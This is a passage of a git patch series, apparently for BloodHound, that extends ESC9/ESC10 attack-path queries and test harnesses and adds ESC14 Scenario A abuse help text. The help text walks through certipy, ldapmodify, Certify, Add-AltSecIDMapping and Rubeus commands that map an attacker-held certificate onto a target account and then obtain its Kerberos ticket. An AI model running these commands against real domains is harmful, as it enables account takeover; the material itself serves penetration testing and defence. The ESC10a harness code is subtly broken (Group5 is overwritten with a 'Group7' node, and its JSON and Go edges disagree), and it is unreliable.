attacker's possession, and then use this certificate to authenticate as the diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WritePublicInformation/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WritePublicInformation/WindowsAbuse.tsx index d17034991d3..634e0ebf142 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WritePublicInformation/WindowsAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WritePublicInformation/WindowsAbuse.tsx @@ -25,6 +25,14 @@ const WindowsAbuse: FC = () => { The write access to the AltSecurityIdentities may enable an ADCS ESC14 Scenario A attack. + + Alternatively, the write access to the SPN enable a targeted Kerberoasting attack against user accounts + with a weak password. See the{' '} + + WriteSPN + {' '} + edge for more details. + An attacker can add an explicit certificate mapping in the AltSecurityIdentities of the target referring to a certificate in the attacker's possession, and then use this certificate to authenticate as the From 85654ceb5bcb856f86934737e8196d21b6aa3d2f Mon Sep 17 00:00:00 2001 From: jknudsen Date: Mon, 23 Jun 2025 10:04:20 +0200 Subject: [PATCH 3/9] add WritePublicInformation in ESC9/10 logic --- .../src/analysis/ad/adcs_integration_test.go | 6 ++- cmd/api/src/test/integration/harnesses.go | 14 ++++-- .../harnesses/esc10aprincipalharness.json | 43 ++++++++++++++++--- .../harnesses/esc10aprincipalharness.svg | 32 +++++++------- .../harnesses/esc9aprincipalharness.json | 43 ++++++++++++++++--- .../harnesses/esc9aprincipalharness.svg | 32 +++++++------- packages/go/analysis/ad/queries.go | 10 +++-- 7 files changed, 125 insertions(+), 55 deletions(-) diff --git a/cmd/api/src/analysis/ad/adcs_integration_test.go b/cmd/api/src/analysis/ad/adcs_integration_test.go index 9b332c3b8d0..754abccf774 100644 --- a/cmd/api/src/analysis/ad/adcs_integration_test.go +++ b/cmd/api/src/analysis/ad/adcs_integration_test.go @@ -1272,13 +1272,14 @@ func TestADCSESC9a(t *testing.T) { })); err != nil { t.Fatalf("error fetching esc9a edges in integration test; %v", err) } else { - assert.Equal(t, 6, len(results)) + assert.Equal(t, 7, len(results)) assert.True(t, results.Contains(harness.ESC9aPrincipalHarness.Group1)) assert.True(t, results.Contains(harness.ESC9aPrincipalHarness.Group2)) assert.True(t, results.Contains(harness.ESC9aPrincipalHarness.Group3)) assert.True(t, results.Contains(harness.ESC9aPrincipalHarness.Group4)) assert.True(t, results.Contains(harness.ESC9aPrincipalHarness.Group5)) + assert.True(t, results.Contains(harness.ESC9aPrincipalHarness.Group6)) assert.True(t, results.Contains(harness.ESC9aPrincipalHarness.User2)) } return nil @@ -2658,13 +2659,14 @@ func TestADCSESC10a(t *testing.T) { })); err != nil { t.Fatalf("error fetching esc10a edges in integration test; %v", err) } else { - require.Equal(t, 6, len(results)) + require.Equal(t, 7, len(results)) require.True(t, results.Contains(harness.ESC10aPrincipalHarness.Group1)) require.True(t, results.Contains(harness.ESC10aPrincipalHarness.Group2)) require.True(t, results.Contains(harness.ESC10aPrincipalHarness.Group3)) require.True(t, results.Contains(harness.ESC10aPrincipalHarness.Group4)) require.True(t, results.Contains(harness.ESC10aPrincipalHarness.Group5)) + require.True(t, results.Contains(harness.ESC10aPrincipalHarness.Group6)) require.True(t, results.Contains(harness.ESC10aPrincipalHarness.User2)) } diff --git a/cmd/api/src/test/integration/harnesses.go b/cmd/api/src/test/integration/harnesses.go index f4437905840..287370579b4 100644 --- a/cmd/api/src/test/integration/harnesses.go +++ b/cmd/api/src/test/integration/harnesses.go @@ -2210,6 +2210,7 @@ type ESC9aPrincipalHarness struct { Group4 *graph.Node Group5 *graph.Node Group6 *graph.Node + Group7 *graph.Node NTAuthStore *graph.Node RootCA *graph.Node User1 *graph.Node @@ -2241,6 +2242,7 @@ func (s *ESC9aPrincipalHarness) Setup(graphTestContext *GraphTestContext) { s.Group4 = graphTestContext.NewActiveDirectoryGroup("Group4", domainSid) s.Group5 = graphTestContext.NewActiveDirectoryGroup("Group5", domainSid) s.Group6 = graphTestContext.NewActiveDirectoryGroup("Group6", domainSid) + s.Group7 = graphTestContext.NewActiveDirectoryGroup("Group7", domainSid) s.NTAuthStore = graphTestContext.NewActiveDirectoryNTAuthStore("NTAuthStore", domainSid) s.RootCA = graphTestContext.NewActiveDirectoryRootCA("RootCA", domainSid) s.User1 = graphTestContext.NewActiveDirectoryUser("User1", domainSid) @@ -2256,7 +2258,8 @@ func (s *ESC9aPrincipalHarness) Setup(graphTestContext *GraphTestContext) { graphTestContext.NewRelationship(s.Group6, s.User1, ad.AllExtendedRights) graphTestContext.NewRelationship(s.Group3, s.User1, ad.WriteDACL) graphTestContext.NewRelationship(s.Group4, s.User1, ad.WriteOwner) - graphTestContext.NewRelationship(s.Group5, s.User1, ad.WriteOwner) + graphTestContext.NewRelationship(s.Group5, s.User1, ad.Owns) + graphTestContext.NewRelationship(s.Group6, s.User1, ad.WritePublicInformation) graphTestContext.NewRelationship(s.User2, s.User2, ad.GenericAll) graphTestContext.NewRelationship(s.User1, s.Group0, ad.MemberOf) graphTestContext.NewRelationship(s.User2, s.Group0, ad.MemberOf) @@ -3747,10 +3750,11 @@ type ESC10aPrincipalHarness struct { User1 *graph.Node Group1 *graph.Node Group2 *graph.Node - Group6 *graph.Node Group3 *graph.Node Group4 *graph.Node Group5 *graph.Node + Group6 *graph.Node + Group7 *graph.Node User2 *graph.Node Group0 *graph.Node } @@ -3777,10 +3781,11 @@ func (s *ESC10aPrincipalHarness) Setup(graphTestContext *GraphTestContext) { s.User1 = graphTestContext.NewActiveDirectoryUser("User1", domainSid) s.Group1 = graphTestContext.NewActiveDirectoryGroup("Group1", domainSid) s.Group2 = graphTestContext.NewActiveDirectoryGroup("Group2", domainSid) - s.Group6 = graphTestContext.NewActiveDirectoryGroup("Group6", domainSid) s.Group3 = graphTestContext.NewActiveDirectoryGroup("Group3", domainSid) s.Group4 = graphTestContext.NewActiveDirectoryGroup("Group4", domainSid) s.Group5 = graphTestContext.NewActiveDirectoryGroup("Group5", domainSid) + s.Group6 = graphTestContext.NewActiveDirectoryGroup("Group6", domainSid) + s.Group5 = graphTestContext.NewActiveDirectoryGroup("Group7", domainSid) s.User2 = graphTestContext.NewActiveDirectoryUser("User2", domainSid) s.Group0 = graphTestContext.NewActiveDirectoryGroup("Group0", domainSid) graphTestContext.NewRelationship(s.RootCA, s.Domain, ad.RootCAFor) @@ -3794,7 +3799,8 @@ func (s *ESC10aPrincipalHarness) Setup(graphTestContext *GraphTestContext) { graphTestContext.NewRelationship(s.Group6, s.User1, ad.AllExtendedRights) graphTestContext.NewRelationship(s.Group3, s.User1, ad.WriteDACL) graphTestContext.NewRelationship(s.Group4, s.User1, ad.WriteOwner) - graphTestContext.NewRelationship(s.Group5, s.User1, ad.WriteOwner) + graphTestContext.NewRelationship(s.Group5, s.User1, ad.Owns) + graphTestContext.NewRelationship(s.Group6, s.User1, ad.WritePublicInformation) graphTestContext.NewRelationship(s.User2, s.User2, ad.GenericAll) graphTestContext.NewRelationship(s.User1, s.Group0, ad.MemberOf) graphTestContext.NewRelationship(s.User2, s.Group0, ad.MemberOf) diff --git a/cmd/api/src/test/integration/harnesses/esc10aprincipalharness.json b/cmd/api/src/test/integration/harnesses/esc10aprincipalharness.json index 9596114e77b..172062e38d2 100644 --- a/cmd/api/src/test/integration/harnesses/esc10aprincipalharness.json +++ b/cmd/api/src/test/integration/harnesses/esc10aprincipalharness.json @@ -189,10 +189,10 @@ { "id": "n9", "position": { - "x": 482.94623164792375, - "y": 657.1984889145978 + "x": 654.085839099432, + "y": 633.957307655751 }, - "caption": "Group6", + "caption": "Group7", "labels": [], "properties": {}, "style": { @@ -264,6 +264,19 @@ "style": { "node-color": "#fcdc00" } + }, + { + "id": "n15", + "position": { + "x": 495.7801848291077, + "y": 652.6385696871592 + }, + "caption": "Group6", + "style": { + "node-color": "#fcdc00" + }, + "labels": [], + "properties": {} } ], "relationships": [ @@ -408,11 +421,11 @@ }, { "id": "n16", - "fromId": "n12", - "toId": "n6", - "type": "WriteOwner", + "type": "Owns", + "style": {}, "properties": {}, - "style": {} + "fromId": "n12", + "toId": "n6" }, { "id": "n17", @@ -461,6 +474,22 @@ "type": "Enroll", "properties": {}, "style": {} + }, + { + "id": "n23", + "type": "ADCSESC10a", + "fromId": "n15", + "toId": "n0", + "style": {}, + "properties": {} + }, + { + "id": "n24", + "type": "Owns", + "fromId": "n15", + "toId": "n6", + "style": {}, + "properties": {} } ] } \ No newline at end of file diff --git a/cmd/api/src/test/integration/harnesses/esc10aprincipalharness.svg b/cmd/api/src/test/integration/harnesses/esc10aprincipalharness.svg index ca2ba973f63..543424b1b29 100644 --- a/cmd/api/src/test/integration/harnesses/esc10aprincipalharness.svg +++ b/cmd/api/src/test/integration/harnesses/esc10aprincipalharness.svg @@ -1,18 +1,18 @@ -RootCAForIssuedSignedByNTAuthStoreForTrustedForNTAuthDCForPublishedToGenericAllADCSESC10aADCSESC10aGenericWriteAllExtendedRightsWriteDaclADCSESC10aADCSESC10aWriteOwnerADCSESC10aWriteOwnerGenericAllADCSESC10aMemberOfMemberOfEnrollEnrollDomainNTAuthStoreRootCAEnterpriseCADCCertificateMappingMethodsRaw:31CertTemplateSchannelAuthenticationEnabled:TrueRequireManagerApproval:FalseSchemaVersion:1SubjectAltRequireUPN:TrueUser1Group1Group2Group6Group3Group4Group5User2Group0 +RootCAForIssuedSignedByNTAuthStoreForTrustedForNTAuthDCForPublishedToGenericAllADCSESC10aADCSESC10aGenericWriteAllExtendedRightsWriteDaclADCSESC10aADCSESC10aWriteOwnerADCSESC10aOwnsGenericAllADCSESC10aMemberOfMemberOfEnrollEnrollADCSESC10aOwnsDomainNTAuthStoreRootCAEnterpriseCADCCertificateMappingMethodsRaw:31CertTemplateSchannelAuthenticationEnabled:TrueRequireManagerApproval:FalseSchemaVersion:1SubjectAltRequireUPN:TrueUser1Group1Group2Group7Group3Group4Group5User2Group0Group6 diff --git a/cmd/api/src/test/integration/harnesses/esc9aprincipalharness.json b/cmd/api/src/test/integration/harnesses/esc9aprincipalharness.json index a8512517539..d9bc9e4a6f5 100644 --- a/cmd/api/src/test/integration/harnesses/esc9aprincipalharness.json +++ b/cmd/api/src/test/integration/harnesses/esc9aprincipalharness.json @@ -190,10 +190,10 @@ { "id": "n9", "position": { - "x": 482.94623164792375, - "y": 657.1984889145978 + "x": 660.4243430791171, + "y": 636.7404784228806 }, - "caption": "Group6", + "caption": "Group7", "labels": [], "properties": {}, "style": { @@ -265,6 +265,19 @@ "style": { "node-color": "#fcdc00" } + }, + { + "id": "n15", + "position": { + "x": 463.0761473193729, + "y": 665.7935615621888 + }, + "caption": "Group6", + "style": { + "node-color": "#fcdc00" + }, + "labels": [], + "properties": {} } ], "relationships": [ @@ -409,11 +422,11 @@ }, { "id": "n16", - "fromId": "n12", - "toId": "n6", - "type": "WriteOwner", + "type": "Owns", + "style": {}, "properties": {}, - "style": {} + "fromId": "n12", + "toId": "n6" }, { "id": "n17", @@ -462,6 +475,22 @@ "type": "Enroll", "properties": {}, "style": {} + }, + { + "id": "n23", + "type": "ADCSESC9a", + "fromId": "n15", + "toId": "n0", + "style": {}, + "properties": {} + }, + { + "id": "n24", + "type": "WritePublicInformation", + "style": {}, + "properties": {}, + "fromId": "n15", + "toId": "n6" } ] } \ No newline at end of file diff --git a/cmd/api/src/test/integration/harnesses/esc9aprincipalharness.svg b/cmd/api/src/test/integration/harnesses/esc9aprincipalharness.svg index 5587bc954b9..20db96238cc 100644 --- a/cmd/api/src/test/integration/harnesses/esc9aprincipalharness.svg +++ b/cmd/api/src/test/integration/harnesses/esc9aprincipalharness.svg @@ -1,18 +1,18 @@ -RootCAForIssuedSignedByNTAuthStoreForTrustedForNTAuthDCForPublishedToGenericAllADCSESC9aADCSESC9aGenericWriteAllExtendedRightsWriteDaclADCSESC9aADCSESC9aWriteOwnerADCSESC9aWriteOwnerGenericAllADCSESC9aMemberOfMemberOfEnrollEnrollDomainNTAuthStoreRootCAEnterpriseCADCStrongCertificateBindingEnforcementRaw:1CertTemplateAuthenticationEnabled:TrueRequireManagerApproval:FalseSchemaVersion:1NoSecurityExtension:TrueSubjectAltRequireUPN:TrueUser1Group1Group2Group6Group3Group4Group5User2Group0 +RootCAForIssuedSignedByNTAuthStoreForTrustedForNTAuthDCForPublishedToGenericAllADCSESC9aADCSESC9aGenericWriteAllExtendedRightsWriteDaclADCSESC9aADCSESC9aWriteOwnerADCSESC9aOwnsGenericAllADCSESC9aMemberOfMemberOfEnrollEnrollADCSESC9aWritePublicInformationDomainNTAuthStoreRootCAEnterpriseCADCStrongCertificateBindingEnforcementRaw:1CertTemplateAuthenticationEnabled:TrueRequireManagerApproval:FalseSchemaVersion:1NoSecurityExtension:TrueSubjectAltRequireUPN:TrueUser1Group1Group2Group7Group3Group4Group5User2Group0Group6 diff --git a/packages/go/analysis/ad/queries.go b/packages/go/analysis/ad/queries.go index d260f14aefb..9745737a00b 100644 --- a/packages/go/analysis/ad/queries.go +++ b/packages/go/analysis/ad/queries.go @@ -1872,13 +1872,17 @@ func FetchAttackersForEscalations9and10(tx graph.Transaction, victimBitmap cardi if attackers, err := ops.FetchStartNodeIDs(tx.Relationships().Filterf(func() graph.Criteria { criteria := query.And( query.KindIn(query.Start(), ad.Group, ad.User, ad.Computer), - query.KindIn(query.Relationship(), ad.GenericAll, ad.GenericWrite, ad.Owns, ad.WriteOwner, ad.WriteDACL), query.InIDs(query.EndID(), graph.DuplexToGraphIDs(victimBitmap)...), ) if scenarioB { - return query.And(criteria, query.KindIn(query.End(), ad.Computer)) + return query.And(criteria, + query.KindIn(query.End(), ad.Computer), + query.KindIn(query.Relationship(), ad.GenericAll, ad.GenericWrite, ad.Owns, ad.WriteOwner, ad.WriteDACL), + ) + } else { + return query.And(criteria, + query.KindIn(query.Relationship(), ad.GenericAll, ad.GenericWrite, ad.Owns, ad.WriteOwner, ad.WriteDACL, ad.WritePublicInformation)) } - return criteria })); err != nil { return nil, err } else { From fd7b472737a99bfbf13582513f34705a2feded0b Mon Sep 17 00:00:00 2001 From: jknudsen Date: Mon, 23 Jun 2025 19:57:25 +0200 Subject: [PATCH 4/9] add ESC14 abuse text to existing edges --- .../HelpTexts/GenericAll/LinuxAbuse.tsx | 298 +++++++++++++++ .../HelpTexts/GenericAll/References.tsx | 7 + .../HelpTexts/GenericAll/WindowsAbuse.tsx | 344 ++++++++++++++++++ .../HelpTexts/GenericWrite/LinuxAbuse.tsx | 197 ++++++++++ .../HelpTexts/GenericWrite/References.tsx | 7 + .../HelpTexts/GenericWrite/WindowsAbuse.tsx | 228 ++++++++++++ .../components/HelpTexts/Owns/LinuxAbuse.tsx | 298 +++++++++++++++ .../components/HelpTexts/Owns/References.tsx | 7 + .../HelpTexts/Owns/WindowsAbuse.tsx | 344 ++++++++++++++++++ .../HelpTexts/WriteDacl/LinuxAbuse.tsx | 298 +++++++++++++++ .../HelpTexts/WriteDacl/References.tsx | 7 + .../HelpTexts/WriteDacl/WindowsAbuse.tsx | 344 ++++++++++++++++++ .../HelpTexts/WriteOwner/LinuxAbuse.tsx | 299 +++++++++++++++ .../HelpTexts/WriteOwner/References.tsx | 7 + .../HelpTexts/WriteOwner/WindowsAbuse.tsx | 234 ++++++++++++ 15 files changed, 2919 insertions(+) diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/LinuxAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/LinuxAbuse.tsx index 3598e0619cb..b542667ec8a 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/LinuxAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/LinuxAbuse.tsx @@ -154,6 +154,104 @@ const LinuxAbuse: FC = ( For other optional parameters, view the pyWhisker documentation. + ADCS ESC14 Scenario A + + An attacker can add an explicit certificate mapping in the AltSecurityIdentities of the target + referring to a certificate in the attacker's possession, and then use this certificate to + authenticate as the target. + + + The certificate must meet the following requirements: +
    +
  1. Chain up to trusted root CA on the DC
    2. +
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. +
  3. + Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry + (UPN) +
    4. +
+

+ The EKUs that enable domain authentication over Kerberos: +

    +
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • +
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • +
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • +
  • Any Purpose (2.5.29.37.0)
    • +
  • SubCA (no EKUs)
    • +
+

+

+ The last certificate requirement means that user certificates will not work, so the + certificate typically must be of a computer. By default, the ADCS certificate template{' '} + Computer (Machine) meets these requirements and grants Domain Computers enrollment + rights. The target can still be a user. +

+ The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} + + How to disable the Subject Alternative Name for UPN mapping + + ). + + + Obtain a certificate meeting the above requirements for example by dumping a certificate from a + computer, or enrolling a new certificate as a computer: + + + {'certipy req -u computername -p Passw0rd -ca corp-DC-CA -target ca.corp.local -template ESC14'} + + + If the enrollment fails with an error message stating that the Email or DNS name is unavailable + and cannot be added to the Subject or Subject Alternate name, then it is because the enrollee + principal does not have their mail or dNSHostName attribute set, which is required by the + certificate template. The mail attribute can be set on both user and computer objects but the + dNSHostName attribute can only be set on computer objects. Computers have validated write + permission to their own dNSHostName attribute by default, but neither users nor computers can + write to their own mail attribute by default. + + + The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber or + X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. + + Get the SHA1 hash of the certificate using openssl: + + {`openssl pkcs12 -info -in computername.pfx -nokeys | openssl x509 -noout -sha1 -fingerprint | tr -d ':' | tr '[:upper:]' '[:lower:]' +… +sha1 fingerprint=f61331a504cff8cb5e60c269632c31aa3032a54a`} + + + Use ldapmodify to add the explicit certificate mapping string to the 'altSecurityIdentities' + attribute of the target principal: + + + { + 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\nadd: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' + } + + Verify the that the mapping was added using ldapsearch: + + { + 'ldapsearch -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h "forestroot.com" -b "CN=Target,CN=Users,DC=forestroot,DC=com" altSecurityIdentities' + } + + + Request a ticket granting ticket (TGT) from the domain using Certipy, specifying the certificate + and the IP of a DC: + + + {'certipy auth -pfx computername.pfx -dc-ip 172.16.126.128'} + + + After the execution of the abuse, use ldapmodify to remove the explicit certificate mapping + string from the ‘altSecurityIdentities’ attribute of the target principal: + + + { + 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\ndelete: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' + } + ); case 'Computer': @@ -274,6 +372,106 @@ const LinuxAbuse: FC = ( For other optional parameters, view the pyWhisker documentation. + ADCS ESC14 Scenario A + + An attacker can add an explicit certificate mapping in the AltSecurityIdentities of the + target referring to a certificate in the attacker's possession, and then use this + certificate to authenticate as the target. + + + The certificate must meet the following requirements: +
    +
  1. Chain up to trusted root CA on the DC
    2. +
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. +
  3. + Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry + (UPN) +
    4. +
+

+ The EKUs that enable domain authentication over Kerberos: +

    +
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • +
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • +
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • +
  • Any Purpose (2.5.29.37.0)
    • +
  • SubCA (no EKUs)
    • +
+

+

+ The last certificate requirement means that user certificates will not work, so the + certificate typically must be of a computer. By default, the ADCS certificate template{' '} + Computer (Machine) meets these requirements and grants Domain Computers + enrollment rights. The target can still be a user. +

+ The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} + + How to disable the Subject Alternative Name for UPN mapping + + ). + + + Obtain a certificate meeting the above requirements for example by dumping a certificate + from a computer, or enrolling a new certificate as a computer: + + + { + 'certipy req -u computername -p Passw0rd -ca corp-DC-CA -target ca.corp.local -template ESC14' + } + + + If the enrollment fails with an error message stating that the Email or DNS name is + unavailable and cannot be added to the Subject or Subject Alternate name, then it is because + the enrollee principal does not have their mail or dNSHostName attribute set, which is + required by the certificate template. The mail attribute can be set on both user and + computer objects but the dNSHostName attribute can only be set on computer objects. + Computers have validated write permission to their own dNSHostName attribute by default, but + neither users nor computers can write to their own mail attribute by default. + + + The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber + or X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. + + Get the SHA1 hash of the certificate using openssl: + + {`openssl pkcs12 -info -in computername.pfx -nokeys | openssl x509 -noout -sha1 -fingerprint | tr -d ':' | tr '[:upper:]' '[:lower:]' +… +sha1 fingerprint=f61331a504cff8cb5e60c269632c31aa3032a54a`} + + + Use ldapmodify to add the explicit certificate mapping string to the 'altSecurityIdentities' + attribute of the target principal: + + + { + 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\nadd: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' + } + + Verify the that the mapping was added using ldapsearch: + + { + 'ldapsearch -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h "forestroot.com" -b "CN=Target,CN=Users,DC=forestroot,DC=com" altSecurityIdentities' + } + + + Request a ticket granting ticket (TGT) from the domain using Certipy, specifying the + certificate and the IP of a DC: + + + {'certipy auth -pfx computername.pfx -dc-ip 172.16.126.128'} + + + After the execution of the abuse, use ldapmodify to remove the explicit certificate mapping + string from the ‘altSecurityIdentities’ attribute of the target principal: + + + { + 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\ndelete: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' + } + ); } else { @@ -327,6 +525,106 @@ const LinuxAbuse: FC = ( For other optional parameters, view the pyWhisker documentation. + ADCS ESC14 Scenario A + + An attacker can add an explicit certificate mapping in the AltSecurityIdentities of the + target referring to a certificate in the attacker's possession, and then use this + certificate to authenticate as the target. + + + The certificate must meet the following requirements: +
    +
  1. Chain up to trusted root CA on the DC
    2. +
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. +
  3. + Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry + (UPN) +
    4. +
+

+ The EKUs that enable domain authentication over Kerberos: +

    +
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • +
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • +
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • +
  • Any Purpose (2.5.29.37.0)
    • +
  • SubCA (no EKUs)
    • +
+

+

+ The last certificate requirement means that user certificates will not work, so the + certificate typically must be of a computer. By default, the ADCS certificate template{' '} + Computer (Machine) meets these requirements and grants Domain Computers + enrollment rights. The target can still be a user. +

+ The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} + + How to disable the Subject Alternative Name for UPN mapping + + ). + + + Obtain a certificate meeting the above requirements for example by dumping a certificate + from a computer, or enrolling a new certificate as a computer: + + + { + 'certipy req -u computername -p Passw0rd -ca corp-DC-CA -target ca.corp.local -template ESC14' + } + + + If the enrollment fails with an error message stating that the Email or DNS name is + unavailable and cannot be added to the Subject or Subject Alternate name, then it is because + the enrollee principal does not have their mail or dNSHostName attribute set, which is + required by the certificate template. The mail attribute can be set on both user and + computer objects but the dNSHostName attribute can only be set on computer objects. + Computers have validated write permission to their own dNSHostName attribute by default, but + neither users nor computers can write to their own mail attribute by default. + + + The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber + or X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. + + Get the SHA1 hash of the certificate using openssl: + + {`openssl pkcs12 -info -in computername.pfx -nokeys | openssl x509 -noout -sha1 -fingerprint | tr -d ':' | tr '[:upper:]' '[:lower:]' +… +sha1 fingerprint=f61331a504cff8cb5e60c269632c31aa3032a54a`} + + + Use ldapmodify to add the explicit certificate mapping string to the 'altSecurityIdentities' + attribute of the target principal: + + + { + 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\nadd: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' + } + + Verify the that the mapping was added using ldapsearch: + + { + 'ldapsearch -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h "forestroot.com" -b "CN=Target,CN=Users,DC=forestroot,DC=com" altSecurityIdentities' + } + + + Request a ticket granting ticket (TGT) from the domain using Certipy, specifying the + certificate and the IP of a DC: + + + {'certipy auth -pfx computername.pfx -dc-ip 172.16.126.128'} + + + After the execution of the abuse, use ldapmodify to remove the explicit certificate mapping + string from the ‘altSecurityIdentities’ attribute of the target principal: + + + { + 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\ndelete: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' + } + ); } diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/References.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/References.tsx index 01d7bce6dca..4830ab6c1f7 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/References.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/References.tsx @@ -169,6 +169,13 @@ const References: FC = () => { https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53
+ + https://posts.specterops.io/adcs-esc14-abuse-technique-333a004dc2b9 + +
= equivalent to the "AddKeyCredentialLink" edge. + + The permission also grants write access to the "altSecurityIdentities" attribute, which enables + an ADCS ESC14 Scenario A attack. + + Alternatively, GenericAll enables {sourceName} to set a ServicePrincipalName (SPN) on the targeted user, which may be abused in a Targeted Kerberoast attack. @@ -169,6 +174,115 @@ const WindowsAbuse: FC = For other optional parameters, view the Whisker documentation. + ADCS ESC14 Scenario A + + An attacker can add an explicit certificate mapping in the altSecurityIdentities of the target + referring to a certificate in the attacker's possession, and then use this certificate to + authenticate as the target. + + + The certificate must meet the following requirements: +
    +
  1. Chain up to trusted root CA on the DC
    2. +
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. +
  3. + Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry + (UPN) +
    4. +
+

+ The EKUs that enable domain authentication over Kerberos: +

    +
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • +
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • +
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • +
  • Any Purpose (2.5.29.37.0)
    • +
  • SubCA (no EKUs)
    • +
+

+

+ The last certificate requirement means that user certificates will not work, so the + certificate typically must be of a computer. By default, the ADCS certificate template{' '} + Computer (Machine) meets these requirements and grants Domain Computers enrollment + rights. The target can still be a user. +

+ The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} + + How to disable the Subject Alternative Name for UPN mapping + + ). + + + Obtain a certificate meeting the above requirements for example by dumping a certificate from a + computer, or enrolling a new certificate as a computer: + + + { + 'Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:Machine /machine' + } + + + If the enrollment fails with an error message stating that the Email or DNS name is unavailable + and cannot be added to the Subject or Subject Alternate name, then it is because the enrollee + principal does not have their mail or dNSHostName attribute set, which is required by the + certificate template. The mail attribute can be set on both user and computer objects but the + dNSHostName attribute can only be set on computer objects. Computers have validated write + permission to their own dNSHostName attribute by default, but neither users nor computers can + write to their own mail attribute by default. + + + Save the certificate as cert.pem and the private key as cert.key. Use certutil to obtain the + certificate as a PFX file: + + {'certutil.exe -MergePFX .\\cert.pem .\\cert.pfx'} + + The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber or + X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. + + + Get the SHA1 hash of the certificate public key using certutil: + + + {`certutil.exe -dump -v .\\cert.pfx +… +Cert Hash(sha1): ef9375785421d3ad286d8bdeb166f0f697266992 +…`} + + + Use Add-AltSecIDMapping to add the explicit certificate mapping string to the + 'altSecurityIdentities' attribute of the target principal: + + + { + 'Add-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' + } + + + Verify the that the mapping was added using Get-AltSecIDMapping: + + + {'Get-AltSecIDMapping -SearchBase "CN=Target,CN=Users,DC=forestroot,DC=com"'} + + + Use Rubeus to request a ticket granting ticket (TGT) from the domain, specifying the target + identity, and the PFX-formatted certificate: + + + {'Rubeus asktgt /user:"forestroot\\target" /certificate:cert.pfx /ptt'} + + + After the execution of the abuse, use 